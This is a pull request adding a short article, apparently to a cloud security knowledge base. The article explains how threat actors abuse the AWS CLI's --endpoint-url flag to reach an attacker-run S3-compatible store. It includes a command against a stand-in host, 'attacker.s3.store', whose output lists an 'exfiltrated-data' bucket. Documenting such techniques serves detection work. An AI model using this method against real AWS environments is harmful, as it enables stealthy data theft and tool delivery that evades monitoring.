### PR TITLE
Added article: Download Tools and Exfiltrate Data with the AWS CLI

### DIFF
--- a/content/aws/post_exploitation/download_tools_and_exfiltrate_data_with_aws_cli.md
+++ b/content/aws/post_exploitation/download_tools_and_exfiltrate_data_with_aws_cli.md
@@ -1,0 +1,29 @@
+---
+author_name: Nick Frichette
+title: Download Tools and Exfiltrate Data with the AWS CLI
+description: Using the AWS CLI as a LOLScript to download and exfiltrate data.
+hide:
+  - toc
+---
+
+<div class="grid cards" markdown>
+
+-   :material-alert-decagram:{ .lg .middle } __Technique seen in the wild__
+
+    ---
+
+    Reference: [SCARLETEEL 2.0: Fargate, Kubernetes, and Crypto](https://sysdig.com/blog/scarleteel-2-0/)
+
+</div>
+
+In an attempt to be stealthy, threat actors will often "[live off the land](https://github.com/LOLBAS-Project/LOLBAS)", using tools and scripts already existing on a host machine outside of their intended purpose. This can help them avoid detection by blending in with their surroundings.
+
+In AWS environments, it is common to find servers which have the AWS CLI installed (It is included by [default](https://docs.aws.amazon.com/cli/v1/userguide/install-linux-al2017.html) in Amazon Linux). This makes it an excellent choice for adversaries to move data around, avoiding more common tools like [curl](https://curl.se/) or [Wget](https://www.gnu.org/software/wget/) which may be monitored for suspicious uses.
+
+As seen in the wild by the [SCARLETEEL](https://sysdig.com/blog/scarleteel-2-0/) threat actor, the AWS CLI can be used to download and exfiltrate data using an attacker-hosted backend. You can host an S3 compatible object store such as [MinIO](https://min.io/) and then use the `--endpoint-url` flag to interact with that service. This makes it easy to download tools, exfiltrate compromised data and more.
+
+```shell
+$ aws s3 ls --endpoint-url https://attacker.s3.store
+2023-07-13 02:06:30 criminalbucket
+2023-07-13 22:01:36 exfiltrated-data
+```


### PR DESCRIPTION
For #272 : This PR adds a very short blog post on using the AWS CLI as a LOLScript to download and exfiltrate data. It's so short (and sort of obvious) but I wanted to include it. Perhaps later down the line I could reformat the article into a general LOLBin/LOLScript page that has multiple?